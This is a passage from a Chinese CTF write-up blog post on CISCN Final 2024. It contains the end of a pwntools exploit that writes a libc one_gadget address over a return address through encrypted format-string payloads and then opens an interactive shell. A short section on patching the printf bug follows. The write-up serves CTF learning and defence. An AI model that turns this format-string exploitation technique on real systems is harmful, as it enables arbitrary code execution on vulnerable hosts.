    <span class="n">one_gadget</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0xe3b01</span>

    <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'[*] write </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">one_gadget</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="p">)</span><span class="si">}</span><span class="s"> to </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">return_addr</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="p">)</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>

    <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'4 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">f</span><span class="s">'%</span><span class="si">{</span><span class="n">return_addr</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="si">}</span><span class="s">c%6$hn</span><span class="se">\0</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">(),</span> <span class="n">key</span><span class="p">))</span>
    <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'3 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">f</span><span class="s">'%</span><span class="si">{</span><span class="n">one_gadget</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="si">}</span><span class="s">c%45$hn</span><span class="se">\0</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">(),</span> <span class="n">key</span><span class="p">))</span>

    <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'[*] write </span><span class="si">{</span><span class="nb">hex</span><span class="p">((</span><span class="n">one_gadget</span><span class="o">&gt;&gt;</span><span class="mi">16</span><span class="p">)</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="p">)</span><span class="si">}</span><span class="s"> to </span><span class="si">{</span><span class="nb">hex</span><span class="p">((</span><span class="n">return_addr</span><span class="o">+</span><span class="mi">2</span><span class="p">)</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="p">)</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>

    <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'2 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">f</span><span class="s">'%</span><span class="si">{</span><span class="p">(</span><span class="n">return_addr</span><span class="o">+</span><span class="mi">2</span><span class="p">)</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="si">}</span><span class="s">c%6$hn</span><span class="se">\0</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">(),</span> <span class="n">key</span><span class="p">))</span>
    <span class="n">sa</span><span class="p">(</span><span class="sa">b</span><span class="s">'1 times'</span><span class="p">,</span> <span class="n">aes128_encrypt</span><span class="p">(</span><span class="sa">f</span><span class="s">'%</span><span class="si">{</span><span class="p">(</span><span class="n">one_gadget</span><span class="o">&gt;&gt;</span><span class="mi">16</span><span class="p">)</span><span class="o">&amp;</span><span class="mh">0xFFFF</span><span class="si">}</span><span class="s">c%45$hn</span><span class="se">\0</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">(),</span> <span class="n">key</span><span class="p">))</span>

    <span class="n">ru</span><span class="p">(</span><span class="sa">b</span><span class="s">'too!</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span>
    <span class="n">io</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>


<span class="c1"># ------------------ Infrastructure ------------------ #
</span>
<span class="k">def</span> <span class="nf">debug</span><span class="p">():</span>
    <span class="n">g</span> <span class="o">=</span> <span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">io</span><span class="p">,</span> <span class="s">"""
        # set debug-file-directory ~/gaio/libs/2.29-0ubuntu2_amd64/.debug/
        b *$rebase(0x1600)
        b *$rebase(0x15cb)
    """</span><span class="p">)</span>
    <span class="c1"># pause()
</span>
<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">"d"</span><span class="p">:</span>
        <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
        <span class="n">debug</span><span class="p">()</span>
    <span class="k">elif</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s">"r"</span><span class="p">:</span>
        <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"Usage: ./exp.py [d | r]"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\t</span><span class="s">d for debug"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\t</span><span class="s">r for remote"</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">()</span>

    <span class="n">pwn</span><span class="p">()</span>
</code></pre></div></div>

<h3 id="patch-1">Patch</h3>

<p>最简单的方式是直接把 <code class="language-plaintext highlighter-rouge">printf</code> 直接改成 <code class="language-plaintext highlighter-rouge">puts</code> 。</p>

<p>我们比赛时 patch 的方法是跳转到 <code class="language-plaintext highlighter-rouge">.eh_frame</code> 段的代码中，执行 <code class="language-plaintext highlighter-rouge">printf("%s", buf)</code>。</p>


  </div>
    
      <b>本博客上与 pwn 相关的贴子：</b>
      <ul>
        
        
          <li><a href="/2024/07/24/CISCN-Final-2024.html">CISCN Final 2024</a></li>
        
          <li><a href="/2024/04/18/BlackHatMEA2023-House-of-Minho.html">BlackHatMEA 2023 House of Minho</a></li>
        
          <li><a href="/2024/02/19/VNCTF2024-escape-langlang-mountain2.html">VNCTF 2024 escape_langlang_mountain2</a></li>
        
          <li><a href="/2023/11/29/HITCTF2023-xv6-Trusted.html">HITCTF 2023 xv6-Trusted</a></li>
        
          <li><a href="/2023/05/04/TAMUctf-2023-Pwnme-linked-ROP-chain.html">TAMUctf 2023 Pwnme - linked ROP chain</a></li>
        
          <li><a href="/2023/04/04/Bing-Chilling.html">UTCTF 2023 Bing Chilling</a></li>
        
      </ul>
    
  

  <div id="comments"></div>
  <script>
  new Valine({
    el: "#comments",
    app_id: "Ji5y9HTOlb2QGDO0XFlWXNRy-gzGzoHsz",
    app_key: "6VqGye1352LX381YQDTOaiXs",
    placeholder: "El Psy Congroo",
  });
</script>


  <a class="u-url" href="/2024/07/24/CISCN-Final-2024.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Y² 的博客</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Y² 的博客</li><li><a class="u-email" href="mailto:cameudis@gmail.com">cameudis@gmail.com</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">cameudis</span></a></li><li><a href="https://www.twitter.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">cameudis</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>料峭春风吹酒醒，微冷，山头斜照却相迎。回首向来萧瑟处，归去，也无风雨也无晴。</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
